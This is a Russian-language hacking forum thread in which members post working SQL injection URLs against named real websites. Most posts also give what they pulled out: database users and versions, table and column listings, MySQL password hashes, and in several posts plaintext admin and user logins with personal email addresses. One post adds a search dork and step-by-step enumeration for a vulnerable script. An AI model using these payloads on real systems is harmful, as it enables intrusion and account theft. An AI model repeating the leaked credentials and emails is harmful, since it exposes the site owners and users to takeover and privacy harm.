SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Tyc00n

    Tyc00n Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    30
    Likes Received:
    25
    Reputations:
    -1
    Разбираем №2 :)
    Code:
    http://www.freefeasibilities.biz/links.php?link_id=-999+union+select+1,user(),version(),4,5,6/*
    Code:
    http://www.black-gold.de/games.php?game_id=-999+union+select+1,2,3,4,5,6,7/*
    Code:
    http://www.internet-allround.de/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*
    Code:
    http://www.bobis24-shop.de/catalog/links.php?link_id=-999+union+select+1,2,3,4,5,6,7,8,9,10/*
    Code:
    http://www.bobolandia.com/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*
    Code:
    http://www.accountablebanking.com/links.php?link_id=-999+union+select+1,2,3,4,concat(user,0x3a,password),6,7,8,9,10,11+from+mysql.user/*
    bh:3a0293a9050b30f9
     
    2 people like this.
  2. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    602
    Likes Received:
    485
    Reputations:
    176
    Code:
    http://www.barriodelcarmen.net/evolucion/index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/**/limit/**/1,10/*
    Alex:2b132404fa9459ff3e6acec9737d3266

    Code:
    http://www.maynooth.org/index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/**/limit/**/1,10/*
    Admin:5fec178cdc2f426f64764b87eaa5b9d7
     
  3. v1ru$

    v1ru$ Elder - Старейшина

    Joined:
    17 Mar 2007
    Messages:
    272
    Likes Received:
    196
    Reputations:
    17
    Code:
    http://www.classicalsource.com/db_control/db_concert_review.php?id=-3392+union+select+concat(user_name,0x3a,password,0x3a,email),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+user+limit+1,1/*
    
    Code:
    http://www.board.46info.ru/catlinks/info/?id=-3221+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat_ws(0x3a,version(),database(),user()),20,21,22,23,24/*
    
     
    1 person likes this.
  4. gibson

    gibson Elder - Старейшина

    Joined:
    24 Feb 2006
    Messages:
    392
    Likes Received:
    247
    Reputations:
    88
    http://bitteam.ru/
    Code:
    http://bitteam.ru/?menu=22&id=-1'+union+select+null,user(),null,null,null,null,null,null,null,null/*
    user: 1gb_bitcms@81.176.226.10
    database: 1gb_bitcms
    mysql: 4.1.21-community-max-nt-log
     
    1 person likes this.
  5. -MoLoToK-

    -MoLoToK- Elder - Старейшина

    Joined:
    4 Oct 2007
    Messages:
    30
    Likes Received:
    23
    Reputations:
    3
    Code:
    http://www.webmasters.org/scripts/software-description.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,Table_Name,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.tables/*
    есть доступ к Information_schema.tables
    одна из интересных таблиц sbwmd_admin
    надеюсь не боян, проверить в данный момент не могу
     
    #3745 -MoLoToK-, 20 Nov 2007
    Last edited: 20 Nov 2007
    1 person likes this.
  6. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,986
    Likes Received:
    871
    Reputations:
    198
    www.teleset-ufa.ru
    root:5aff30257b10b358
    file_priv - Y
     
    _________________________
    1 person likes this.
  7. ЛифчиС5СВ

    ЛифчиС5СВ Elder - Старейшина

    Joined:
    9 Mar 2007
    Messages:
    164
    Likes Received:
    141
    Reputations:
    12
    Решил до Италии добраться в ответ на топик в Новостях о том, что русские сайты - самые плохие, а итальянские - лучшие =)

    www.sodalitas.it
    Code:
    _http://www.sodalitas.it/news.php?ID=9+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+user
    Group и Order не помогли. =(
    Думал, запарюсь, пока подберу столбцы, но на 46-ом все закончилось. Фу-х =)

    Нужная нам таблица: user
    Нужный нам user: admin
    Колонки в user: user, password
     
    1 person likes this.
  8. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    Исследуем Румынию

    ziuaiasi.ro
    Code:
    http://www.ziuaiasi.ro/articol.html?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9/*
    5.0.27-log:ziua:ziua@localhost

    81 таблицa:
    Code:
    http://www.ziuaiasi.ro/articol.html?id=-1+union+select+1,2,3,4,5,6,table_name,8,9+from+information_schema.tables+limit+80,1/*
    Поля табы users:
    Code:
    id, userId, nume, parola, mail, varsta, oras, studii, newsletter, data, activ
    Поля табы phpbb_users:
    Code:
    user_id,user_active,[COLOR=Yellow]username[/COLOR],[COLOR=Yellow]user_password[/COLOR],user_session_time,user_session_page,user_lastvisit,user_regdate,[COLOR=Yellow]user_level[/COLOR],user_posts,user_timezone,user_style,user_lang,user_dateformat,user_new_privmsg,user_unread_privmsg,user_last_privmsg,user_emailtime,user_viewemail,user_attachsig,user_allowhtml,user_allowbbcode,user_allowsmile,user_allowavatar,user_allow_pm,user_allow_viewonline,user_notify,user_notify_pm,user_popup_pm,user_rank,user_avatar,user_avatar_type,[COLOR=Yellow]user_email[/COLOR],[COLOR=Yellow]user_icq[/COLOR],[COLOR=Yellow]user_website[/COLOR],user_from,user_sig,user_sig_bbcode_uid,[COLOR=Yellow]user_aim[/COLOR],[COLOR=Yellow]user_yim[/COLOR],[COLOR=Yellow]user_msnm[/COLOR],[COLOR=Yellow]user_occ[/COLOR],user_interests,user_actkey,user_newpasswd
    Админ форума (login:md5[password]):
    Code:
    webmaster:e0afac77ae41af23c696457742954ac5
    electronica-azi.ro
    Code:
    http://www.electronica-azi.ro/articol.php?id_ar=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18/*
    4.0.27-log:electronicaazi:electronicaazi@localhost
     
    1 person likes this.
  9. Twiddle

    Twiddle Elder - Старейшина

    Joined:
    6 Sep 2006
    Messages:
    14
    Likes Received:
    7
    Reputations:
    0
    Code:
    Password ;) :web55ter
     
    1 person likes this.
  10. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    Румыния

    old.jurnalul.ro
    Code:
    http://old.jurnalul.ro/articol.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
    5.0.24a-log:jurnalul:jurnalul@avjnet-web

    45 таблиц:
    Code:
    http://old.jurnalul.ro/articol.php?id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables+limit+44,1/*
    Наша таблица - admin:
    Code:
    id,username,parola,pages,data,status
    username : parola
    Code:
    zass:floaredelotus
    cristi:dinamo
    lucian:lucian
     
    1 person likes this.
  11. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    Румыния

    fundatia-sundari.ro
    Code:
    http://www.fundatia-sundari.ro/marturii.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5/*
    5.0.45-community-log:fundatia_sundaridefault:fundatia_Robert@localhost

    43 таблицы:
    Code:
    http://www.fundatia-sundari.ro/marturii.php?id=-1+union+select+1,2,table_name,4,5+from+information_schema.tables+limit+42,1/*
    Есть таба Users:
    Code:
    UserID,Nume,Parola,Email,Level,
    FirstName,LastName,Newsletter,Activated,
    LastLogin,LastIP,ConfirmationCode,SundariEMail,
    SundariEMailActivated,LastTime,MSN,Y,AIM,
    ICQ,Oras,DataNasterii,SiteWeb,Ocupatia,
    Interese,Personal,Imagine
    - hacked -
     
  12. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://www.videodive.ru/imgnews/news.php?id=-163+union+select+1,concat_ws(0x2F,version(),user(),database()),3,4,5,6,7,8,9,10,11,12/*

    4.0.26-log/u9053@10.10.223.211/u9053
     
  13. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://ron.the-underdogs.info/game.php?id=-135+union+select+1,concat_ws(0x2F,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x2F,user,password),23,24,25,26,27,28,29,30,31,32,33,34,35+from+mysql.user/*
    Данные: 4.0.27/ron@localhost/ron
    Юзеры правда хеш 8(

    root/4bca6e21230d24de
    flashback/4e62830249e37403
    ron/1b4fdeb00b833ac5
    macgarden/4a5fe7e15ca085b0
    Underdogs/4bca6e21230d24de
    doggie/69288c4855bbb52a
    forum/3bd00f75423ddffd
    hotu/3213f1351227ad25
    community/4dfedf012cc6837d
    zzt/0e5829ac32cde319
    john_doe/70520cc9573c1cd3
    phpAds/58efd1e0451c7a6c
     
    1 person likes this.
  14. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://www.krepsinis.net/news.php?news_id=-66514+union+select+1,concat_ws(0x2F,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,concat_ws(char(58,58),FIRST_NAME,password),14,15,16,17,18,19,20+from+users+limit+2,2/*
    Данные: 5.0.22-log/sportotiltas1@192.168.69.21/krepsinis

    Админы и юзеры

    Saulius::66666
    Vaidas::vynas
    Mindaugas::Eimantukas
    Tomas::121212
    Dainius::alytus
    Tadas::tokogero666
    Arvydas::vaisas
    Matas::mamamia
    Romanas::sharp
    Valdas::zatoic
    Valentinas::33977
     
  15. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://www.flushy.com/games.php?id=-324+union+select+1,concat_ws(0x2F,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13/*
    4.0.27-max-log/flushy@64.202.163.220/flushy
     
    1 person likes this.
  16. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    Румыния

    traditii.ro
    Code:
    http://www.traditii.ro/articol.php?nr_articol=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/*
    4.1.22-standard-log:traditii_traditii:traditii_cata@localhost

    parerea.com
    Code:
    http://parerea.com/articol.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12/*
    4.1.22-standard : parereac_wrdp1 : parereac@localhost

    agir.ro
    Code:
    http://www.agir.ro/articol.php?id_articol=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10/*
    5.0.45-community-log:agirro_ziar:agirro_agir@localhost

    76 таблиц:
    Code:
    http://www.agir.ro/articol.php?id_articol=-1+union+select+1,table_name,3,4,5,6,7,8,9,10+from+information_schema.tables+limit+75,1/*
    Наша таба - agir_users:
    Code:
    id,username,password,email,title,realname,url,icq,msn,aim,yahoo,
    location,use_avatar,signature,disp_topics,disp_posts,email_setting,
    save_pass,notify_with_post,smilies,show_img,show_avatars,show_sig,
    link_to_new_win,timezone,style,num_posts,status,last_post,registered,
    last_visit,last_action,admin_note,activate_string
    Вывод данных:
    Code:
    http://www.agir.ro/articol.php?id_articol=-1+union+select+1,concat_ws(0x3a,username,password,email),3,4,5,6,7,8,9,10+from+agirro_forum.agir_users+limit+109,1/*
     
    2 people like this.
  17. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    Румыния - не обижайся!

    visione.ro
    Code:
    http://www.visione.ro/articol.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11/*
    5.1.20-beta-log:visione:visione@localhost

    87 таблиц:
    Code:
    http://www.visione.ro/articol.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11+from+information_schema.tables+limit+86,1/*
    Наши табы forum_users и users

    Данные из users (юзер:пасс:мыло:статус):
    Code:
    andrei:andrei17:andrei@his.ro:Admin
    tibi:t0nal357:tibi@visione.ro:Admin
    mihaela:euristic:mihaelaraducea@yahoo.com:Moderator
    loredana:huodinamo:lungu_lore@yahoo.com:Moderator
    Cosmina:liublliuliubllia:cosmina@visione.ro:Admin
    afs:timisoara:afsava@socio.uvt.ro:Moderator
    adi:adi:office@subgraphic.ro:Admin
    nusa:nusa:nusa.bugeac@gmail.com:Supervizor
    andrei.bold:andrei:andrei.bold@sistempsi.ro:Supervizor
    ada:ada:gravekiss@yahoo.co.uk:Supervizor 
    cristina:cristina:cristina2find@yahoo.com.au:Supervizor
    camelia:camelia:camitza84@yahoo.com:Supervizor
    Админка по адресу _http://www.visione.ro/admin/,
    данные для админки смотри выше :D
     
    1 person likes this.
  18. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,857
    Likes Received:
    1,962
    Reputations:
    594
    SQL-инъекция в HotScripts Clone Script
    Code:
    http://site/software-description.php?id=[SQL-inj]
    
    Дорк: inurl:"software-description.php?"
    Пример: www.filelook.com
    Смотрим версию мускула, текущего юзера, имя базы:
    Code:
    _http://www.filelook.com/software-description.php?id=-1+union+select+concat(version(),0x3a,user(),0x3a,database())/
    5.0.45-community:filelook_fileloo@localhost:filelook_filelook
    Повезло версия мускула=>5, имена таблиц подбирать не нужно, есть таблица information_schema: смотрим названия таблиц, меняя лимит:
    Code:
    _http://www.filelook.com/software-description.php?id=-1+union+select+table_name+from+information_schema.tables+limit+1,1/*
    
    Таблицы:
    CHARACTER_SETS (0)
    COLLATIONS (1)
    COLLATION_CHARACTER_SET_APPLICABILITY (2)
    COLUMNS (3)
    COLUMN_PRIVILEGES (4)
    KEY_COLUMN_USAGE (5)
    PROFILING (6)
    ROUTINES (7)
    SCHEMATA (8)
    SCHEMA_PRIVILEGES (9)
    STATISTICS (10)
    TABLES (11)
    TABLE_CONSTRAINTS (12)
    TABLE_PRIVILEGES (13)
    TRIGGERS (14)
    USER_PRIVILEGES (15) -
    VIEWS (16)
    csv_feed (17)
    data (18)
    filelook_author_submission (19)
    filelook_awards (20)
    filelook_errreport (21)
    phpcountersmart_besucher (22)
    phpcountersmart_browser (23)
    phpcountersmart_color (24)
    phpcountersmart_ip (25)
    phpcountersmart_os (26)
    phpcountersmart_provider (27)
    phpcountersmart_referer (28)
    phpcountersmart_screen (29)
    sbwmd_admin (30) - интересная таблица ;-) поля: id, admin_name, pwd
    sbwmd_ads (31)
    sbwmd_banners (32)
    sbwmd_categories(33)
    sbwmd_config(34) - интересная таблица ;-)

    Всего 35 таблиц.
    Смотрим логин и пасс админа, id:
    Code:
    _http://www.filelook.com/software-description.php?id=-1+union+select+concat(admin_name,char(58),pwd,char(58),id)+from+sbwmd_admin/*
    
    admin:minur786:1
    Находим админку:
    Code:
    _http://www.filelook.com/siteadmin 
    К сожалению... облом! (логин и пасс не подходят к админке или запрещены удалённые подключения ?).

    Как посмотреть остальных админов?
    Почему запросы с limit и where не прокатывают?
    Code:
    _http://www.filelook.com/software-description.php?id=-1+union+select+concat(admin_name,char(58),pwd,char(58),id)+from+sbwmd_admin+limit+1,1/*
    _http://www.filelook.com/software-description.php?id=-1+select+admin_name+from+sbwmd_admin+where+id=2/*
    Ещё один пример: brigaderu.ru
    Code:
    http://brigaderu.ru/software-description.php?id=-1+union+select+concat(version(),0x3a,user(),0x3a,database())/*
    
    4.1.22:brigader@fe20.hc.ru:wwwbrigaderuru
    Админ:
    Code:
    _http://brigaderu.ru/software-description.php?id=-1+UNION+SELECT+concat(admin_name,char(58),pwd,char(58),id)+FROM+sbwmd_admin/*
    siteadm:brg48Zm:1
    Дальше всё аналогично предыдущему примеру: к в админку не пускает, файлы читать,имхо, нет привилегий, limit,where не катят. В чём косяк?
     
    3 people like this.
  19. big_BRAT

    big_BRAT Elder - Старейшина

    Joined:
    23 Dec 2006
    Messages:
    78
    Likes Received:
    64
    Reputations:
    7
    я думаю нет там косяка, просто нету больше админов
    1. _http://www.filelook.com/software-description.php?id=-1+union+select+count(admin_name)+from+sbwmd_admin/*
    count возвращает кол 1

    limit and order тоже работают
    http://www.filelook.com/software-description.php?id=-1+union+select+concat(admin_name,char(58),pwd,char(58),id)+from+sbwmd_admin+limit+0,1/*
    , такая же история и с "+where+id=1/*"
     
    1 person likes this.
  20. Tyc00n

    Tyc00n Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    30
    Likes Received:
    25
    Reputations:
    -1
    Code:
    http://www.1adruck.de/catalog/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*
    Code:
    http://www.patronen-markt.de/catalog/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*
    Code:
    http://www.hiddenstreamfarm.com/catalog-hsf/links.php?link_id=-999+union+select+1,2,user(),4,5,6,7,8,9/*
    Code:
    http://www.fitnesstienda.com/links.php?link_id=-999+union+select+1,2,3,4,5,6,7,8,9/*
    Code:
    http://www.ocioportal.net/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*
    Code:
    http://www.bibeloty.com.pl/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*
     
    1 person likes this.
Loading...
Thread Status:
Not open for further replies.